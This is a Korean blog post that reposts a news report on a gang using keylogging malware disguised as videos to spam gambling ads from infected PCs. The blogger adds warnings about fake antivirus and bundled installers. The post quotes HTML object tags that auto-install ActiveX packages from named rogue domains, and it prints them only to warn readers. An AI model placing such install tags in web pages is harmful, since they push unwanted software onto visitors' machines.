ANMIAN

수많은 인터넷 블로그나 미니홈피를 불법 광고물로 도배하는 새로운 해킹 기법이 나타났다.

　특히 이들 해커는 치밀하게 조직된 기업형인데다 정보보호 대회 입상 경력자 등 전문 프로그래머까지 포함돼 있어 충격을 주고 있다.

　그간 스팸메일을 이용한 광고는 일반화돼 있었지만 많은 네티즌이 즐기고 있는 블로그나 미니홈피에 유해한 광고를 불법으로 올리는 악성코드가 출현한 것은 처음이다.

　경찰청 사이버테러대응센터는 12일 인터넷 미니홈피·블로그·게시판 등에 불법 도박 사이트 광고글을 무차별 게시한 강모씨 등 일당 7명을 검거했으며 중국에 거주하는 나머지 공범 3명에 대한 수사도 진행하고 있다고 밝혔다.

　이들은 악성코드로 PC를 감염시켜 아이디와 비밀번호 정보를 빼내는 것은 물론이고 감염된 PC가 수집된 아이디로 각종 인터넷 사이트에 광고글까지 자동으로 게시하게 하는 악성코드를 제작했다고 경찰청은 설명했다.

　포털사이트 등에서 정상 프로그램으로 위장한 악성코드 다운로드를 유도하고 악성코드가 설치되면 사용자가 키보드로 아이디와 비밀번호를 입력할 때마다 이를 중국에 설치된 서버에 전송한다. 이후 중국의 관리자가 감염된 PC에 원하는 광고글을 내려보내면 숙주 PC는 서버에 모인 아이디로 광고글을 무차별적으로 올리는 방식. 악성코드는 일반 포털 사이트의 동영상 UCC로 위장하고 기존 안티바이러스 백신이 찾기 힘들게끔 설계돼 피해가 더 컸다.

　경찰청은 이들이 작년 9월부터 11월까지 무려 12억회에 걸쳐 광고글을 올려 자신들이 중국에 개설한 불법 도박 사이트로 사용자를 유도했으며 도박 사이트 운영으로 1억여원의 수익을 올린 것으로 파악된다고 밝혔다.

　특히 이번 사건은 정보보호 대회 입상 경력자 등 전문 프로그래머 2명이 가담하고 총책을 비롯, 대포통장 제공자와 광고 및 테스트 담당자 등으로 지능화·분업화했다는 점에서 충격을 주고 있다. 이들 전문 프로그래머는 기존 안티바이러스 백신이 찾기 힘들게 이들은 추적을 피하기 위해 중국에 서버를 설치하고 현지에서 관리 및 환전 업무 등을 하게 한 치밀함까지 보였다.

　양근원 경찰청 사이버테러대응센터장은 “전문가와 범죄자가 결합한 지능화된 범죄 사례”라며 “악성코드를 요즘 인기가 높은 인터넷 동영상 등으로 위장해 피해자가 늘었다”고 말했다. 경찰청은 신뢰할 수 없는 게시물에 첨부된 프로그램을 설치하지 않고 백신 및 보안 패치를 최신 상태로 유지할 것을 권고했다. 또 포털 사이트와 백신 제조 업체 등에도 게시물 관리 강화 및 백신 업데이트 등의 조치를 요구했다.

　이번 사건은 PC를 무려 100만대나 감염시킬 때까지 규모도 적지 않은데다 참여와 공유의 공간으로 떠오른 온라인 사이트들에 대한 무차별 공격으로 인터넷의 신뢰 저하도 우려된다. 피해자들은 자신도 모르는 사이에 불법 광고글을 올리는 범법자로 오인받을 수도 있는 상황이다.

　한세희기자@전자신문, hahn@

=====================================================================

조금 다른 이야기지만 유명한 사이트들에 게시글로 위장하여 악성코드를 퍼트리는 경우도 많다.
대부분 제목을 교모하게 해서 낚시하는데 아래는 관련 코드다.

<object classid=clsid:05DA48C8-AECE-4CF7-BE58-7D52883A7FAD codebase=http://pcclear.co.kr/app/Active/ClearAX.cab#version=1,0,0,1 width=100 height=0 id=ClearAX><PARAM name=sUserName value=lieekr></object><OBJECT classid="clsid:765A88D3-EB24-4A26-ACCF-1F754DB281FE"
codebase="http://pcbagsa.com/down/pcbaksaActiveFormProj1.cab#version=1,0,0,0"
width=0 height=0 align=center hspace=0 vspace=0>
<param name="Url" value="http://pcbagsa.com/update/">
<param name="Mode" value="Install">
<param name="PartnerID" value="ddrr443">
</OBJECT>

object태그를 이용하여 사용하고 있는데 iframe이나 script등의 태그를 이용하여 설치를 유도하기도 한다. (블로그 중에 egloos는 자신의 블로그에도 이러한 태그사용을 금지하여 막고 있지만 그렇게하니 막히는 것이 너무 많아서 결국 블로그를 이사하는 중요하 이유가 되어버렸다.)
아무튼 요즘 악성코드막아준다는 악성코드가 너무 많다. 심지어 무료로 검사해준다고까지 하고는 막 검사하는척 한다. 그런 다음 심각한 악성코드(주로 트로이목마나 웜같이 이름이 알려진 것들)가 발견되었다면서 당장 치료하라고 한다. 치료를 위해서는 돈을 내야한다. 그런데 포맷한 다음 바로 그 프로그램만 돌려도 그런 결과가 나오니 참 신기한 악성코드다..ㅡㅡ;
<param name="Mode" value="Install"> 이부분 조심해야 한다. 자동으로 설치를 유도한다. 한국 사람들은 컴퓨터에 프로그램이 설치되는 것을 너무 쉽게 생각한다. 무조건 다음다음다음다음다음 누르다 보면 큰일난다.

다른 예로 프로그램을 설치할 때 끼워서 같이 설치하는 것들도 있다. 잘 보이지 않는 곳에 체크박스를 두고 설치하는 도중에 '요것도 같이 설치해볼래?' 그러면서 유도한다. 설치하는 동안 프로그램을 설명하는 화면과 인터페이스가 똑같고 다음버트을 누르는 과정도 똑같기 때문에 버튼 한번 잘못 누르면 같이 설치하게 된다.

심리적으로 한번 허용한 것에 대해서는 끝까지 허용하려는 고객심리가 있다. 일단 처음 프로그램을 허용하면 껴서 같이 설치하는 녀석은 별 의심없이 설치해주려는 것이다. 알툴즈중 하나를 설치하면 다른 제품을 같이 설치하도록 유도하는 것은 소극적인 방법이고 구글툴바같은 경우는 상당히 심각하다.
구글이 유포하는 소프트웨어들의 성능이 비교적 만족스럽긴 하나 사용자(user)의 의견을 무시하고 장제로 시장에 침투하려는 태도는 상당히 짜증난다.

아무튼 악성코드 조심!! 뭔가 설치하라고 할 때 조금만 신경쓰면 악성코드는 대부분 걸러낼 수 있다!!!!